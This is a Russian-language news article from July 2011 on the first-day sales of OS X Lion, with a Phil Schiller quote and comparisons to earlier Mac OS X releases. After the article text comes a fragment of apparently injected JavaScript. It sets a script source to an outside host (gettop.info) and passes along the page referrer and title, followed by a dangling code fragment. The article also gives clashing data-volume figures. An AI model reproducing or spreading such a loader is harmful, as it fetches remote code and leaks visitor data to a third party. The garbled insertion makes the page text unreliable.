Один миллион копий Lion продано через Mac App Store

22.07.2011, Новости, Софт, Кирилл Месяц

Компания Apple сегодня объявила, что более 1 миллиона экземпляров OS X Lion было скачано в день ее выхода из магазина App Mac  пользователями по всему миру. Также отмечается, что Lion покупается быстрее, чем любой другой дистрибутив ОС в истории Apple.

Главный маркетолог Apple Фил Шиллер:

Lion отправился к своему большому началу, отзывы пользователей и реакция промышленности была фантастической. Lion представляет собой огромный шаг вперед, ведь он оснащен не только инновационными возможностями, но и невероятной простотой для пользователей при обновлении своих Mac на лучшую операционную систему из всех, которые мы когда-либо делали.

Дистрибутив имеет размер 3,7 Гбайт, суммарный объем загруженных данных составил более 3,5 петабайт -  3 700 000 гигабайт.

В 2005 году компании Apple потребовалось более месяца, чтобы продать 2 миллиона копий Mac OS X Tiger. Спустя 2 года, Apple продала более 2 миллионов копий Mac OS X Leopard за свой первый уик-энд.

В 2009 году было подсчитано, что продажи Snow Leopard, который, как и Lion, стоил значительно дешевле, чем Tiger и Leopard, были вдвое больше, чем Leopard, хотя Apple не освещала число этих продаж в пресс-релизе, как теперь она это делает с Lion.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

} else {

Читайте также:

  1. Теперь разработчики могут публиковать в Mac App Store свои приложения для OS X Lion
  2. Вышла Mac OS X Lion GM
  3. Lion выйдет завтра
  4. В преддверии выхода Mac OS X Lion продажи Mac App Store оставляют желать лучшего
  5. Первая загрузка OS X Lion GM

Оставить комментарий

Обязательно.

Обязательно. Не публикуется.